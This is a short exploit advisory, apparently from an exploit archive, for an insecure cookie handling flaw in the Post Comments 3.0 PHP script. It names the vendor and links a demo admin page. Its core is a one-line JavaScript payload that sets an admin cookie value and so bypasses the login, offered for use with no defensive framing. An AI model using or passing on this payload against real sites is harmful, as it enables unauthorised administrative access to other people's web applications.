id: 3801
date: 09/28/2008
title: Post Comments 3.0 Insecure Cookie Handling Vulnerability
author: Crackers_Child
cves: 

========================================================
Post Comments 3.0 Insecure Cookie Handling Vulnerability
========================================================


Post Comments v3.0 Insecure Cookie Handling Vulnerability
****************************
By Crackers_Child
****************************
Demo : http://www.phpjabbers.com/post-comment/try/admin.php

Vendor :   by phpjabbers.com

Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
****************************
Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun.
****************************



#  0day.today [2023-03-25]  #